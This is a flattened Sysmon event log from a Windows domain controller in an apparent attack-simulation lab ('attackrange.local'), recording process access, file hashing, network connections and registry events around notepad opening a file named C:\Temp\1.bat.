12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-64C5-6064-A500-00000000AE01}43565668C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+17d35c|C:\Windows\System32\SHELL32.dll+1981d8|C:\Windows\System32\SHELL32.dll+2845d3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17d600 154100x80000000000000009067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.094{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Temp\1.batC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000009066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=165CE9A120DBC59C7427B9FE076EE4FF,SHA256=552F753F8337AF30EFE817A52FF758077BE45238D53B4BB73E23791A6787EF33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:20.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=326F9476DA53468AC5229BF695BFFD69,SHA256=08E7729A5A8CE833892DCA72DADAD41A9AFA9032D797AED1F43739BFABE3F6CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:21.166{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FF591FCDE12BBF0F2D2AFA65D202CB,SHA256=8AB6E8BAD51066198BB61B787AF71E3D1931E13283D1607339247FB08595272B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:22.211{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF091F5DB3C1CF287882CC9C039150C,SHA256=826A2BD9C1B46B3ACCCA65D6054F05E1E88AC5995FC722B53523B6FCA889D602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:23.226{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11E8D1516AFD4878799DD4508C5266BE,SHA256=D28EA7C3AD76DED67B2F12A8C72F7632CAAF6C96366B26C0E593889FD09EBF5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.381{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000009094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.256{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA1ABB94E0FECBC1F0873D1D5C04B9E0,SHA256=A45FC852F499A23549F3CC163EAD5F9F1B95B548208E5FB8EF57B024A66FA4DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:25.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5005BACAB036B4E1288B87BBA994DBB,SHA256=07F7F68D03C1F753A49B86E8722996F5913A92F0EB8169A225D5FA9767B69167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:25.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F7E7FBAB430A5EB636F48829EED7D11,SHA256=1717DBDF54C26D82EA9F4EDBC081C2A3A6DB98B4F322AE64C32340618532CCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:25.302{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47560F3715E47D5DAA0DE7BBCEFECA90,SHA256=4EBA241AD54FB8F889D781811CA344F8A06AEE185CC0DD5CC5488724CDFE85B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:23.494{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53625-false10.0.1.12-8000- 23542300x80000000000000009102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:26.379{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21959BF734E86BA6512E6159A2122817,SHA256=8010D32C63EA8154E499AE897AB8F96BB6B8789D40C712DAA2C275107A3FD609,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.691{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53626-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000009100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:24.691{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53626-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x80000000000000009103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:27.393{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0AB751619589129FE2F3DD1366892A7,SHA256=06C47D135D1C0C549D8491704C99944BEE3009CBABC4BD41F6D73650EB8D2AA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:28.829{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5005BACAB036B4E1288B87BBA994DBB,SHA256=07F7F68D03C1F753A49B86E8722996F5913A92F0EB8169A225D5FA9767B69167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:28.532{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DD5B58BB54995828D7586E780F2D4C6,SHA256=B9949CC1AD2148180C65C92E89EC25E04487CB6EE58B8659FE04CAF6AAAB3351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:29.578{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3016E5C0CB41CA729D23BA1A4C70C73E,SHA256=872BBCC1C319C0E6D7FB6E6CF4EDB94257008B8A8C9FAD30DCCCC3A54803AAD1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:29.032{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x0089347d) 23542300x80000000000000009109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:30.593{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=512376E84010A941620471C2C401AB1A,SHA256=66CC35C38E6083715F1EF4085B459222810892F6D03594709A6E1ADC29EE0780,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:29.432{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53627-false10.0.1.12-8000- 10341000x80000000000000009117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.654{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:31.607{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C98EA8BEE9030FC0029D869C26514C85,SHA256=0540F170C9AFE52AF8FE80C1109765C02CEDACAD9C1C9613FDC12DF7F46EB455,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:32.637{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90149EA1BF37787AC905AC77548792D8,SHA256=D5A0055F888DFA1B2D56C758148855435A78E4CA202BDB88ED3DAFC539072B80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:33.667{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C1C7DE5FB40A236C28943454327B6B,SHA256=2F2D37EE9C12C9DF77368D83CCBC54DB64F27BD21AB87894B7D00D43D86E19E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:34.729{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD8549601D5C3CAFCD64B3DF527349A,SHA256=7541C564CE47851F0B8647055945B18F36F24C111D630116017BCA706AEAC0A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:35.884{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65B81D10528008F0039C1A159FC431F,SHA256=D40F0E20F9ED94E997BAE53B19D700FDBF086A7B13594A785DBF5290B79DB8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.929{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08059FF30D102770A6BD7CC3D64C8DCD,SHA256=6607A0D2DB06A0402BF96A2F3E5C88C51233B726F8C0CBD9200C3B24F79A00FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:35.385{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53628-false10.0.1.12-8000- 10341000x80000000000000009128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:36.211{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 